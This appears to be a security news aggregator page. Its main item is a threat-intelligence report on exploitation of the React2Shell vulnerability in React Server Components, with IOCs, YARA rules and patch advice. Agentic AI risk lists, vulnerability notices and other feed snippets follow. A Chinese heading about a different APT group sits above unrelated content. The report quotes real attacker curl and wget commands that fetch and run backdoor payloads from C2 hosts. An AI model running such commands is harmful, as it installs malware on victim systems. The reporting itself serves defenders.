Aggregator

海莲花APT组织攻击活动和攻击手法

Written by: Aragorn Tseng, Robert Weiner, Casey Charrier, Zander Work, Genevieve Stark, Austin Larsen

Introduction

On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups.

GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlaps with activity previously reported by Huntress. These observed campaigns highlight the risk posed to organizations using unpatched versions of React and Next.js. This post details the observed exploitation chains and post-compromise behaviors and provides intelligence to assist defenders in identifying and remediating this threat.

For information on how Google is protecting customers and mitigation guidance, please refer to our companion blog post, Responding to CVE-2025-55182: Secure your React and Next.js workloads.

CVE-2025-55182 Overview

CVE-2025-55182 is an unauthenticated RCE vulnerability in React Server Components with a CVSS v3.x score of 10.0 and a CVSS v4 score of 9.3. The flaw allows unauthenticated attackers to send a single HTTP request that executes arbitrary code with the privileges of the user running the affected web server process.

GTIG considers CVE-2025-55182 to be a critical-risk vulnerability. Due to the use of React Server Components (RSC) in popular frameworks like Next.js, there are a significant number of exposed systems vulnerable to this issue. Exploitation potential is further increased by two factors: 1) there are a variety of valid payload formats and techniques, and 2) the mere presence of vulnerable packages on systems is often enough to permit exploitation.

The specific RSC packages that are vulnerable to CVE-2025-55182 are versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of:

• react-server-dom-webpack

• react-server-dom-parcel

• react-server-dom-turbopack

A large number of non-functional exploits, and consequently false information regarding viable payloads and exploitation logic, were widely distributed about this vulnerability during the initial days after disclosure. An example of a repository that started out wholly non-functional is this repository published by the GitHub user "ejpir", which, while initially claiming to be a legitimate functional exploit, has now updated their README to appropriately label their initial research claims as AI-generated and non-functional. While this repository still contains non-functional exploit code, it also now contains legitimate exploit code with Unicode obfuscation. While instances like this initially caused confusion across the industry, the number of legitimate exploits and their capabilities have massively expanded, including in-memory Next.js web shell deployment capabilities. There are also exploit samples, some entirely fake, some non-functional, and some with legitimate functionality, containing malware targeting security researchers. Researchers should validate all exploit code before trusting its capabilities or legitimacy.

Technical write-ups about this vulnerability have been published by reputable security firms, such as the one from Wiz. Researchers should refer to such trusted publications for up-to-date and accurate information when validating vulnerability details, exploit code, or published detections.

Additionally, there was a separate CVE issued for Next.js (CVE-2025-66478); however, this CVE has since been marked as a duplicate of CVE-2025-55182.

Observed Exploitation Activity

Since exploitation of CVE-2025-55182 began, GTIG has observed diverse payloads and post-exploitation behaviors across multiple regions and industries. In this blog post we focus on China-nexus espionage and financially motivated activity, but we have additionally observed Iran-nexus actors exploiting CVE-2025-55182.

China-Nexus Activity

As of Dec. 12, GTIG has identified multiple China-nexus threat clusters utilizing CVE-2025-55182 to compromise victim networks globally. Amazon Web Services (AWS) reporting indicates that China-nexus threat groups Earth Lamia and Jackpot Panda are also exploiting this vulnerability. GTIG tracks Earth Lamia as UNC5454. Currently, there are no public indicators available to assess a group relationship for Jackpot Panda.

MINOCAT

GTIG observed China-nexus espionage cluster UNC6600 exploiting the vulnerability to deliver the MINOCAT tunneler. The threat actor retrieved and executed a bash script used to create a hidden directory ($HOME/.systemd-utils), kill any processes named "ntpclient", download a MINOCAT binary, and establish persistence by creating a new cron job and a systemd service and by inserting malicious commands into the current user's shell config to execute MINOCAT whenever a new shell is started. MINOCAT is an 64-bit ELF executable for Linux that includes a custom "NSS" wrapper and an embedded, open-source Fast Reverse Proxy (FRP) client that handles the actual tunneling.

SNOWLIGHT

In separate incidents, suspected China-nexus threat actor UNC6586 exploited the vulnerability to execute a command using cURL or wget to retrieve a script that then downloaded and executed a SNOWLIGHT downloader payload (7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a). SNOWLIGHT is a component of VSHELL, a publicly available multi-platform backdoor written in Go, which has been used by threat actors of varying motivations. GTIG observed SNOWLIGHT making HTTP GET requests to C2 infrastructure (e.g., reactcdn.windowserrorapis[.]com) to retrieve additional payloads masquerading as legitimate files.

curl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com&p=443&t=tcp&a=l64&stage=true -o <filename>

Figure 1: cURL command executed to fetch SNOWLIGHT payload

COMPOOD

GTIG also observed multiple incidents in which threat actor UNC6588 exploited CVE-2025-55182, then ran a script that used wget to download a COMPOOD backdoor payload. The script then executed the COMPOOD sample, which masqueraded as Vim. GTIG did not observe any significant follow-on activity, and this threat actor's motivations are currently unknown.

wget http://45.76.155[.]14/vim -O /tmp/vim /tmp/vim "/usr/lib/polkit-1/polkitd --no-debug"

Figure 2: COMPOOD downloaded via wget and executed

COMPOOD has historically been linked to suspected China-nexus espionage activity. In 2022, GTIG observed COMPOOD in incidents involving a suspected China-nexus espionage actor, and we also observed samples uploaded to VirusTotal from Taiwan, Vietnam, and China.

HISONIC

Another China-nexus actor, UNC6603, deployed an updated version of the HISONIC backdoor. HISONIC is a Go-based implant that utilizes legitimate cloud services, such as Cloudflare Pages and GitLab, to retrieve its encrypted configuration. This technique allows the actor to blend malicious traffic with legitimate network activity. In this instance, the actor embedded an XOR-encoded configuration for the HISONIC backdoor delimited between two markers, "115e1fc47977812" to denote the start of the configuration and "725166234cf88gxx" to mark the end. Telemetry indicates this actor is targeting cloud infrastructure, specifically AWS and Alibaba Cloud instances, within the Asia Pacific (APAC) region.

<version>115e1fc47977812.....REDACTED.....725166234cf88gxx</version>

Figure 3: HISONIC markers denoting configuration

ANGRYREBEL.LINUX

Finally, we also observed a China-nexus actor, UNC6595, exploiting the vulnerability to deploy ANGRYREBEL.LINUX. The threat actor uses an installation script (b.sh) that attempts to evade detection by masquerading the malware as the legitimate OpenSSH daemon (sshd) within the /etc/ directory, rather than its standard location. The actor also employs timestomping to alter file timestamps and executes anti-forensics commands, such as clearing the shell history (history -c). Telemetry indicates this cluster is primarily targeting infrastructure hosted on international Virtual Private Servers (VPS).

Financially Motivated Activity

Threat actors that monetize access via cryptomining are often among the first to exploit newly disclosed vulnerabilities. GTIG observed multiple incidents, starting on Dec. 5, in which threat actors exploited CVE-2025-55182 and deployed XMRig for illicit cryptocurrency mining. In one observed chain, the actor downloaded a shell script named "sex.sh," which downloads and executes the XMRIG cryptocurrency miner from GitHub. The script also attempts to establish persistence for the miner via a new systemd service called "system-update-service."

GTIG has also observed numerous discussions regarding CVE-2025-55182 in underground forums, including threads in which threat actors have shared links to scanning tools, proof-of-concept (PoC) code, and their experiences using these tools.

Outlook and Implications

After the disclosure of high-visibility, critical vulnerabilities, it is common for affected products to undergo a period of increased scrutiny, resulting in a swift but temporary increase in the number of vulnerabilities discovered. Since the disclosure of CVE-2025-55182, three additional React vulnerabilities have been disclosed: CVE-2025-55183, CVE-2025-55184, and CVE-2025-67779. In this case, two of these follow-on vulnerabilities have relatively limited impacts (restricted information disclosure and causing a denial-of-service (DoS) condition). The third vulnerability (CVE-2025-67779) also causes a DoS condition, as it arose due to an incomplete patch for CVE-2025-55184.

Recommendations

Organizations utilizing React or Next.js should take the following actions immediately:

1. Patch Immediately:

1. To prevent remote code execution due to CVE-2025-55182, patch vulnerable React Server Components to at least 19.0.1, 19.1.2, or 19.2.1, depending on your vulnerable version. Patching to 19.2.2 or 19.2.3 will also prevent the potential for remote code execution.

2. To prevent the information disclosure impacts due to CVE-2025-55183, patch vulnerable React Server Components to at least 19.2.2.

3. To prevent DoS impacts due to CVE-2025-55184 and CVE-2025-67779, patch vulnerable React Server Components to 19.2.3. The 19.2.2 patch was found to be insufficient in preventing DoS impacts.

2. Deploy WAF Rules: Google has rolled out a Cloud Armor web application firewall (WAF) rule designed to detect and block exploitation attempts related to this vulnerability. We recommend deploying this rule as a temporary mitigation while your vulnerability management program patches and verifies all vulnerable instances.

3. Audit Dependencies: Determine if vulnerable React Server Components are included as a dependency in other applications within your environment.

4. Monitor Network Traffic: Review logs for outbound connections to the indicators of compromise (IOCs) listed below, particularly wget or cURL commands initiated by web server processes.

5. Hunt for Compromise: Look for the creation of hidden directories like $HOME/.systemd-utils, the unauthorized termination of processes such as ntpclient, and the injection of malicious execution logic into shell configuration files like $HOME/.bashrc.

Indicators of Compromise (IOCs)

To assist defenders in hunting for this activity, we have included IOCs for the threats described in this blog post. A broader subset of related indicators is available in a Google Threat Intelligence Collection of IOCs available for registered users.

Indicator

Type

Description

reactcdn.windowserrorapis[.]com

Domain

SNOWLIGHT C2 and Staging Server

82.163.22[.]139

IP Address

SNOWLIGHT C2 Server

216.158.232[.]43

IP Address

Staging server for sex.sh script

45.76.155[.]14

IP Address

COMPOOD C2 and Payload Staging Server

df3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540

SHA256

HISONIC sample

92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3

SHA256

HISONIC sample

0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696

SHA256

ANGRYREBEL.LINUX sample

13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274

SHA256

XMRIG Downloader Script 

(filename: sex.sh)

7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a

SHA256

SNOWLIGHT sample (filename: linux_amd64)

776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273

SHA256

MINOCAT sample

YARA Rules MINOCAT rule G_APT_Tunneler_MINOCAT_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_modified = "2025-12-10" rev = "1" md5 = "533585eb6a8a4aad2ad09bbf272eb45b" strings: $magic = { 7F 45 4C 46 } $decrypt_func = { 48 85 F6 0F 94 C1 48 85 D2 0F 94 C0 08 C1 0F 85 } $xor_func = { 4D 85 C0 53 49 89 D2 74 57 41 8B 18 48 85 FF 74 } $frp_str1 = "libxf-2.9.644/main.c" $frp_str2 = "xfrp login response: run_id: [%s], version: [%s]" $frp_str3 = "cannot found run ID, it should inited when login!" $frp_str4 = "new work connection request run_id marshal failed!" $telnet_str1 = "Starting telnetd on port %d\n" $telnet_str2 = "No login shell found at %s\n" $key = "bigeelaminoacow" condition: $magic at 0 and (1 of ($decrypt_func, $xor_func)) and (2 of ($frp_str*)) and (1 of ($telnet_str*)) and $key } COMPOOD rule G_Backdoor_COMPOOD_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_modified = "2025-12-11" rev = “1” md5 = “d3e7b234cf76286c425d987818da3304” strings: $strings_1 = "ShellLinux.Shell" $strings_2 = "ShellLinux.Exec_shell" $strings_3 = "ProcessLinux.sendBody" $strings_4 = "ProcessLinux.ProcessTask" $strings_5 = "socket5Quick.StopProxy" $strings_6 = "httpAndTcp" $strings_7 = "clean.readFile" $strings_8 = "/sys/kernel/mm/transparent_hugepage/hpage_pmd_size" $strings_9 = "/proc/self/auxv" $strings_10 = "/dev/urandom" $strings_11 = "client finished" $strings_12 = "github.com/creack/pty.Start" condition: uint32(0) == 0x464C457f and 8 of ($strings_*) } SNOWLIGHT rule G_Hunting_Downloader_SNOWLIGHT_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_created = "2025-03-25" date_modified = "2025-03-25" md5 = "3a7b89429f768fdd799ca40052205dd4" rev = 1 strings: $str1 = "rm -rf $v" $str2 = "&t=tcp&a=" $str3 = "&stage=true" $str4 = "export PATH=$PATH:$(pwd)" $str5 = "curl" $str6 = "wget" $str7 = "python -c 'import urllib" condition: all of them and filesize < 5KB }

The Trump administration appears to have dropped sanctions against Chinese actors for the Salt Typhoon attacks on US telecoms; but focusing on diplomacy alone misses the full picture, experts say.

Check out the most critical threats to agentic AI applications, and then dive into the worst software weaknesses of 2025. Plus, learn about pro-Russia hacktivists’ attacks against critical infrastructure; AI governance best practices for boards; and NCSC’s updated security-certificate guidance.

Key takeaways

1. OWASP released its inaugural list of top 10 risks for agentic AI, providing a critical framework to help organizations secure autonomous AI agents against unique threats like goal hijacking and tool misuse.
2. CISA and MITRE published the 2025 Top 25 Most Dangerous Software Weaknesses, a list that application developers, cyber pros and risk managers can use to make more informed software-security decisions.
3. A joint international advisory warns that pro-Russia hacktivist groups are aggressively targeting global critical infrastructure sectors using unsophisticated, opportunistic tactics to exploit operational technology (OT) systems.

Here are five things you need to know for the week ending December 12.

1 - OWASP releases Top 10 list for agentic AI security risks

If your organization has started using agentic AI tools – autonomous agents that can plan, execute workflows and make decisions with limited or no human oversight – your cyber team now has a new resource.

This week, the Open Worldwide Application Security Project (OWASP) released its "OWASP Top 10 for Agentic Applications 2026," whose goal is to help organizations identify and mitigate the unique risks associated with these autonomous AI systems.

"Companies are already exposed to agentic AI attacks - often without realizing that agents are running in their environments," Keren Katz, co-lead for OWASP's Top 10 for Agentic AI Applications and senior group manager of AI security at Tenable, said in a statement. 

"While the threat is already here, the information available about this new attack vector is overwhelming. Effectively protecting a company against agentic AI requires not only strong security intuition but also a deep understanding of how AI agents fundamentally operate," Katz added.
 

Unlike standard generative AI, agentic AI systems can take direct action, coordinate with other agents and make decisions with limited human intervention. This shift creates unique vulnerabilities. 

Here are OWASP’s top 10 risks for agentic AI applications:

• Agent goal hijack, which refers to attackers manipulating an AI agent's core objectives, turning helpful assistants into potential threats
• Tool misuse and exploitation, where AI agents may be tricked into misusing legitimate digital tools for destructive purposes or unauthorized actions
• Identity and privilege abuse, a scenario in which an AI agent's credentials are compromised or mismanaged, causing it to operate far beyond its intended scope
• Agentic supply chain vulnerabilities, which allow attackers to compromise the third-party components, libraries or datasets an AI agent relies on to function, poisoning its runtime environment
• Unexpected code execution, where the reliance on natural language to control AI agent actions opens new avenues for attackers to trick systems into running malicious code on the host
• Memory and context poisoning, in which malicious actors can corrupt an agent's long-term memory to influence future behavior
• Insecure inter-agent communication, where without proper verification, attackers spoof or intercept messages exchanged between agents, misdirecting entire clusters of autonomous systems.
• Cascading failures, which refers to how a single error or false signal in one AI agent can propagate through interlinked agents, amplifying the damage across interconnected systems.
• Human-agent trust exploitation, a scenario where agents can generate polished, confident-sounding explanations that mislead human operators into approving dangerous or erroneous actions
• Rogue agents, which are compromised AI agents that exhibit misalignment or take self-directed actions that conflict with their original purpose
   

(Source: "OWASP Top 10 for Agentic Applications 2026" report from OWASP, December 2025)

Developed with input from over 100 industry experts, this guide serves as a benchmark for securing the next generation of autonomous AI technologies.

“These are not theoretical risks. They are the lived experience of the first generation of agentic adopters-and they reveal a simple truth: Once AI began taking actions, the nature of security changed forever,” John Sotiropoulos, OWASP GenAI Security Project Board Member & Agentic Security Initiative Co-lead, wrote in a blog post.

“The Agentic Top 10 distills this new reality into a framework the world can use with actionable mitigations and new architectural blueprints,” he added.

For more information about agentic AI security, check out these Tenable blogs:

• “Agentic AI Security: Keep Your Cyber Hygiene Failures from Becoming a Global Breach”
• “A Practical Defense Against AI-led Attacks”
• “Microsoft Copilot Studio Security Risk: How Simple Prompt Injection Leaked Credit Cards and Booked a $0 Trip”
• “Frequently Asked Questions About Model Context Protocol (MCP) and Integrating with AI for Agentic Applications”
• “AI Security: Web Flaws Resurface in Rush to Use MCP Servers”

2 - Here are the software flaws causing the most chaos

The list of the most severe and prevalent software weaknesses is out, and whether you’re a cyber pro, a developer or a risk manager, these insights can help you make better informed security decisions next year.

Published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and MITRE this week, the "2025 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses" features familiar foes like cross-site scripting (XSS), as well as some new ones.

So how can your team use this list? CISA and MITRE suggest that it can help you cut down on vulnerabilities by adopting development lifecycle changes and making safer architectural decisions. 
 

You can also lower costs by eradicating weaknesses early, which lets you reduce remediation and incident response. The list, the agencies say, can also help product teams identify weaknesses to avoid, as they practice secure-by-design development.

Here’s the full list of the most critical software weaknesses attackers exploit:

#Weakness NameCWE IDCVEs in KEVRank Last Year1Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')CWE-79712Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')CWE-8943 (up 1)3Cross-Site Request Forgery (CSRF)CWE-35204 (up 1)4Missing AuthorizationCWE-86209 (up 5)5Out-of-bounds WriteCWE-787122 (down 3)6Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')CWE-22105 (down 1)7Use After FreeCWE-416148 (up 1)8Out-of-bounds ReadCWE-12536 (down 2)9Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')CWE-78207 (down 2)10Improper Control of Generation of Code ('Code Injection')CWE-94711 (up 1)11Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')CWE-1200N/A12Unrestricted Upload of File with Dangerous TypeCWE-434410 (down 2)13NULL Pointer DereferenceCWE-476021 (up 8)14Stack-based Buffer OverflowCWE-1214N/A15Deserialization of Untrusted DataCWE-5021116 (up 1)16Heap-based Buffer OverflowCWE-1226N/A17Incorrect AuthorizationCWE-863418 (up 1)18Improper Input ValidationCWE-20212 (down 6)19Improper Access ControlCWE-2841N/A20Exposure of Sensitive Information to an Unauthorized ActorCWE-200117 (down 3)21Missing Authentication for Critical FunctionCWE-3061125 (up 4)22Server-Side Request Forgery (SSRF)CWE-918019 (down 3)23Improper Neutralization of Special Elements used in a Command ('Command Injection')CWE-77213 (down 10)24Authorization Bypass Through User-Controlled KeyCWE-639030 (up 6)25Allocation of Resources Without Limits or ThrottlingCWE-770026 (up 1)

“CISA and MITRE encourage organizations to review this list and use it to inform their respective software security strategies,” read a CISA statement.

For more information about software security:

• “OWASP Top Ten Web Application Security Risks” (OWASP)
• “12 key application security best practices” (TechTarget)
• “What is software security and why is it important?” (IEEE)
• “New UK Security Guidelines Aim to Reshape Software Development” (DarkReading)
• “AI-Powered DevSecOps: Navigating Automation, Risk and Compliance in a Zero-Trust World” (DevOps.com)

3 - Pro-Russia hacktivists leverage simple tactics to disrupt critical infrastructure

Critical infrastructure organizations, pay attention.

Hacktivist groups acting on behalf of the Russian government are targeting global critical infrastructure sectors, including energy; water systems; and food and agriculture. 

The warning comes via the advisory “Opportunistic Pro-Russia Hacktivists Attack US and Global Critical Infrastructure,” jointly published this week by a group of multi-national cybersecurity and law enforcement agencies, including CISA.

Groups such as the Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16) and Sector16 are leveraging opportunistic methods to infiltrate operational technology (OT) networks, often gaining access through insecure, internet-facing virtual network computing (VNC) connections.

“The pro-Russia hacktivist groups highlighted in this advisory have demonstrated intent and capability to inflict tangible harm on vulnerable systems,” CISA Executive Assistant Director for Cybersecurity Nick Andersen said in a statement.
 

While these groups generally lack the sophistication of state-sponsored advanced persistent threats (APTs), their actions can still cause significant disruption. By exploiting weak security controls, such as default passwords and exposed human-machine interfaces (HMIs), they manipulate industrial control systems. 

“The threat actors' intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate," the advisory reads. Yet, the attacks have had operational impacts like "loss of view" for system operators and potential physical damage to equipment.

To mitigate these risks, the authoring agencies recommend that critical infrastructure organizations take immediate action to harden their OT environments, including:

• Reduce internet exposure: Disconnect OT assets from the public-facing internet wherever possible. If remote access is necessary, use secure methods like VPNs.
• Strengthen authentication: Implement robust multifactor authentication (MFA) for all access to OT networks and devices. Avoid using default passwords.
• Improve asset management: Adopt mature asset management processes to map data flows and identify all access points within the OT environment.
• Limit remote access: Restrict VNC and other remote access services to only authorized users and essential operations.

CISA is also calling on OT device manufacturers to adopt secure-by-design principles in order to build security into their products from the start.

For more information about OT security, check out these Tenable resources:

• “Mind the Gap: A Roadmap to IT/OT Alignment” (white paper)
• “Unlock Advanced IoT Visibility in your OT Environment Security” (on-demand webinar)
• “Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk” (white paper)
• “Fortifying Your OT Environment: Vulnerability and Risk Mitigation Strategies” (on-demand webinar)
• “Identity Security Is the Missing Link To Combatting Advanced OT Threats” (blog)

4 - How to align board oversight with the reality of AI adoption

Is your board treating AI as just another tech trend or as the existential shift it truly is? 

A new McKinsey report, "The AI reckoning: How boards can evolve," argues that while 88% of organizations use AI, board governance is lagging dangerously behind. 

To bridge this gap, directors must stop viewing AI solely through a technological lens and start understanding it as a catalyst that fundamentally reshapes competitive dynamics.
 

The report identifies four distinct AI postures for companies: 

• Business pioneers, which position AI at their strategy’s core
• Internal transformers, where AI underpins operations
• Functional reinventors, which leverage AI to sharpen workflows
• Pragmatic adopters, which use AI for specific applications

Further, it outlines governance actions boards should take, including:

• Align on AI posture: Regularly review how AI fits into the company's strategic ambition to ensure that its stance reflects current realities.
• Clarify oversight ownership: Explicitly define which AI topics belong to the full board, which sit with committees and which remain with management to prevent accountability gaps.
• Codify a governance framework: Establish clear project-scaling rules, risk thresholds, vendor guardrails, and escalation triggers to guide decision-making.
• Build AI fluency: Directors need not be data scientists, but they must understand how AI creates specific risks and opportunities for their business.

"The rules, risks, and expectations related to AI are evolving rapidly, and boards cannot assume today’s practices are sufficient to meet the new challenges and opportunities," reads the report.

For more information about AI governance and oversight:

• “AI in Cybersecurity: Governance and Risk Quantification in the Boardroom” (Fair Institute)
• “Security for AI: A Practical Guide to Enforcing Your AI Acceptable Use Policy” (Tenable)
• “Governance of AI: A Critical Imperative for Today’s Boards" (Harvard Law School)
• “6 Best Practices for Implementing Commonly Available AI Governance Frameworks" (CDO Magazine)
• “Implementing AI Governance" (National Association of Corporate Directors)

5 - NCSC updates guidance on security certificates, TLS and IPsec

Is your organization ready for the shift toward shorter certificate lifetimes and automated management? 

That’s a key topic in the U.K. National Cyber Security Centre’s (NCSC) updated guide "Provisioning and managing certificates in the Web PKI," published this week.

It replaces previous NCSC guidance to reflect the evolving landscape of the web public key infrastructure (PKI). The NCSC highlights the need for organizations to shift away from manual management to reduce human error and to prepare for a future where certificates expire much faster.
 

The guidance aligns with recent NCSC advice on external attack surface management (EASM) and offers several key recommendations, including:

• Use automated certificate provisioning: Adopt automated protocols like ACME to reduce the burden of manual management and prevent expiration due to human error.
• Prepare for shorter validity periods: Recognize that the ecosystem is moving toward shorter certificate lifecycles.
• Monitor issuance and renewal: Maintain awareness of which certificates are in use and utilize certificate transparency (CT) logs to detect unexpected issuance.
• Avoid wildcard certificates: Limit the use of wildcard certificates to reduce the impact if a private key is compromised.
• Prefer domain validation: Use domain validation (DV) certificates for all use cases, as browsers now treat them as equivalent to organization validation (OV) and extended validation (EV) certificates.

"We will be producing more substantial revisions to our TLS and IPsec guidance in the near future, introducing additional recommended profiles / cipher suite preferences that include post-quantum cryptography, as the relevant protocol standards are finalised," reads a complementary NCSC blog. 

A sophisticated phishing campaign has emerged that successfully bypasses multi-factor authentication, protecting Microsoft 365 and Okta users, representing a serious threat to organizations relying on these platforms for identity management. The campaign, discovered in early December 2025, demonstrates advanced knowledge of authentication flows. This campaign targets companies across multiple industries through carefully crafted phishing emails […]

The post New AiTM Attack Campaign That Bypasses MFA Targeting Microsoft 365 and Okta Users appeared first on Cyber Security News.

ImmuniWeb has unveiled a major update to its ImmuniWeb AI Platform, based on ongoing research as well as valuable feedback from customers and partners in over 50 countries. This cumulative Q4 update builds on the Q3 update announced in early October. Most Q4 improvements focus on security testing for AI-specific vulnerabilities and weaknesses in web and mobile applications, as well as enhanced testing and reporting for regulatory and compliance purposes. The update also combines detection … More →

The post ImmuniWeb enhances AI vulnerability testing and compliance reporting appeared first on Help Net Security.

Вебинар Positive Technologies состоится 16 декабря в 14:00.

The cybersecurity landscape of 2025 has been marked by an unprecedented surge in vulnerability exploitation, with threat actors leveraging critical flaws across enterprise software, cloud infrastructure, and industrial systems. This comprehensive analysis examines the twenty most dangerous exploited vulnerabilities of the year, highlighting their technical details, exploitation methods, and the urgent need for organizations to […]

The post Top 20 Most Exploited Vulnerabilities of 2025: A Comprehensive Analysis appeared first on Cyber Security News.

A vulnerability classified as problematic has been found in Ays Pro Secure Copy Content Protection and Content Locking Plugin up to 4.9.2 on WordPress. Affected by this issue is some unknown functionality of the component CSV File Parser. This manipulation causes information disclosure. The identification of this vulnerability is CVE-2025-14442. It is possible to initiate the attack remotely. There is no exploit available.

A vulnerability classified as problematic was found in Simple Bike Rental Plugin up to 1.0.6 on WordPress. This affects the function simpbire_carica_prenotazioni of the component Email Address Handler. Such manipulation leads to missing authorization. This vulnerability is referenced as CVE-2025-14065. It is possible to launch the attack remotely. No exploit is available.

A vulnerability, which was classified as problematic, has been found in Events Manager Plugin up to 7.2.2.2 on WordPress. This vulnerability affects the function get_location. Performing manipulation results in information disclosure. This vulnerability is identified as CVE-2025-12408. The attack can be initiated remotely. There is not any exploit available.

A vulnerability was found in AI Feeds Plugin up to 1.0.22 on WordPress. It has been rated as problematic. This impacts the function aife_post_meta of the component Shortcode Handler. Performing manipulation results in cross site scripting. This vulnerability is reported as CVE-2025-14030. The attack is possible to be carried out remotely. No exploit exists.

A vulnerability categorized as problematic has been discovered in Events Manager Plugin up to 7.2.2.2 on WordPress. Affected is the function location_delete. Executing manipulation can lead to cross-site request forgery. This vulnerability appears as CVE-2025-12407. The attack may be performed from remote. There is no available exploit.

A vulnerability identified as problematic has been detected in Magical Posts Display Plugin up to 1.2.54 on WordPress. Affected by this vulnerability is an unknown functionality of the component Magical Posts Accordion Widget. The manipulation of the argument mpac_title_tag leads to cross site scripting. This vulnerability is traded as CVE-2025-12965. It is possible to initiate the attack remotely. There is no exploit available.

A vulnerability labeled as problematic has been found in Ays Pro Secure Copy Content Protection and Content Locking Plugin up to 4.9.2 on WordPress. Affected by this issue is the function ays_sccp_results_export_file. The manipulation results in cross-site request forgery. This vulnerability is known as CVE-2025-14159. It is possible to launch the attack remotely. No exploit is available.

A vulnerability classified as critical was found in Apache Fineract up to 1.11.0. Impacted is an unknown function of the component Self-service API. Executing manipulation can lead to improper control of resource identifiers. The identification of this vulnerability is CVE-2025-58137. The attack may be launched remotely. There is no exploit available. Upgrading the affected component is advised.

Побег, фальшивый паспорт и экстрадиция в США закончились для До Квона сроком в 15 лет после признания вины.

针对CodeQL海量误报痛点，利用按需上下文提取与引导式提问技术，引入LLM进行精准二审。该方案将误报率降低超90%，仅以极低成本在Linux Kernel等项目中挖掘出8个高危CVE。

A vulnerability was found in alokjaiswal Hotel-Management-services-using-MYSQL-and-php up to 5f8b60a7aa6c06a5632de569d4e3f6a8cd82f76f. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /dishsub.php. The manipulation of the argument item.name results in cross site scripting. This vulnerability is known as CVE-2025-14201. It is possible to launch the attack remotely. Furthermore, an exploit is available. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.

A vulnerability identified as critical has been detected in Yottamaster DM2, DM3 and DM200 up to 1.2.23/1.9.12. Affected by this issue is some unknown functionality of the component File Upload. Performing manipulation results in path traversal. This vulnerability is known as CVE-2025-14224. Remote exploitation of the attack is possible. Furthermore, an exploit is available. The vendor was contacted early about this disclosure but did not respond in any way.